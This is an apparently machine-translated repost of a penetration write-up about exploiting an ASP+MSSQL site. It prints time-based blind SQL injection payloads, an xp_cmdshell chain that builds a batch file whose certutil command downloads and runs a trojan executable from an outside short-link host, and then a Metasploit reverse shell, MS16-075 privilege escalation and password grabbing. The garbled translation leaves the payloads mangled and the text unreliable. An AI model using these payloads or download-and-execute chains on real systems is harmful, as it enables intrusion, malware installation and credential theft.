Shulou(Shulou.com)05/31 Report--

Asp+mssql injection and command implementation is how, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Preface

There was a site in hw that had vulnerabilities in mssql injection and command execution, and encountered some obstacles in its exploitation.

Process

First of all, I collected the information and found that there was a forum service open in a high port, so I opened the site for routine testing. At the user name and in the search box, I got an error after entering single quotation marks. This is very likely to be the injection point, because I have not done asp+mssql injection before, so I went to consult the boss. The site is get. After testing, it is found that the boss can pass parameters through post (it should be using the Request.Form function of asp). It cannot be blindly injected through bool, but it can be injected blindly through stacking time, payload'. If (db_name () like'A%') waitfor delay'0 waitfor delay'0 like'A%' 10'--here you can test through burp's tester, add a-z0-9 to the dictionary, and then enumerate to determine the return time. Here's an example.

When enumerating to t, there is a delay of 5 seconds, which proves that the first character of the database is t, and then use burp's tester to modify the location to be tested to add a dictionary to modify the thread to view the results sorted by time.

Get the next bit of the database is e, and then get the database name. Determine whether the user has dba permission'; if (select IS_SRVROLEMEMBER ('sysadmin')) >% temp/6.bat'-- is 61 characters, so the command cannot be executed normally, so it is necessary to reduce the payload, remove the extension written to the file, and rename it with the copy command after writing the file, so the payload is'. Exec master..xp_cmdshell 'echo set quality% a% b% > >% temp/6'--, is constructed to get a complete payload.

@ echo off > >% temp%/3 certuti > >% temp%/3 l > >% temp%/3% a% b% > >% temp%/3 che > >% temp%/3% Q% a% > >% temp%/3 it ht > >% temp%/3% Q% a% > >% temp%/3 tp://suo > >% temp%/3% Q% a% > >% temp%/3 .im / 5UEW > >% temp%/3% Q% a% > >% temp%/3 Nn > >% temp%/3% Q%% a% > >% temp%/3%% temp%% > >% temp%/3% Q%% a% > >% temp%/3 / 1.exe > >% temp%/3% Q% a% > >% temp%/3% Q% > >% temp%/3copy% temp%\ 3% temp%\ 3.bat% temp%\ 3.bat% temp%\ 1.exe

The idea is to write the command to a file, then change the unsuffixed file into bat through the copy command, execute the download command inside, download muma remotely to the specified directory, and then run muma through command execution. Of course, you have to test whether the target is offline and whether it is dba, and turn on xp_cmdshell.

Show advanced optionsxp_cmdshellftp x.x.x.x

Execute nc-lvvp 21 on the server if there is an echo, prove that the target can execute the command and go out of the network, and then first conduct a local test to test whether the command has been successfully executed and whether it can be successfully written to the file. It is found that the command has been executed successfully, but it is not written to the file, so the asp code is modified to show the sql statement. Here is the code that I reproduced locally.

It is found that it is% unencoded and disappeared by url decoding in post passing parameters, so modify payload

20@echo%20off > > 25temp%25/3%20setcertuti > > 25temp%25/3%20setl%20-urlca > > 25temp%25/3%20set%25a%25%25b%25 > > 25temp%25/3%20setche%20-spl > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20setit%20-f%20ht > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20settp://suo > > 25temp%25/3%20set 25q%25%25a%25 > > 25temp%25/3%20set.im/5UEW > > 25temp%25/3%20set%25q%25%25a%25 > 25temp%25/3%20setnn%20 > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20set%25%25temp%25%25 > > 25temp%25/3%20set%25q%25%25a%25 > > 25temp%25/3%20set/1.exe > > 25temp%25/3%20set%25q%25%25a % 25 > >% 25temp%25/3%20%25q%25 > >% 25temp%25/3copy%20%25temp%25\ 3%20%25temp%25\ 3.bat%25temp%25\ 3.bat%25temp%25\ 1.exe

After execution, msf receives the shell and checks the permissions through the tasklist command to see if there are processes that kill software and run locally, so they need to raise the right to grab the password because the local permissions are low.

Use post/multi/recon/local_exploit_suggester

Local_exploit_suggester using msf matches some possible exp modules for vulnerabilities that can be used to exploit the rights of vulnerable targets. After that, use ms16075 to lift rights locally to get system permissions and grab passwords.

Summary

Because I had no contact with asp+mssql before, it was very clumsy when I first encountered the target, including when maintaining permissions and horizontally, before I had time to do it, I had already been discovered. Before I used msf, I was in my own virtual machine, and there were many differences between the environment and the real environment. Moreover, msf rebound uses reserve_tcp, and does not use rc4 or https to encrypt traffic. As a result, the permission was taken down for only 2 hours before it was discovered by the defender and shut down the website.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.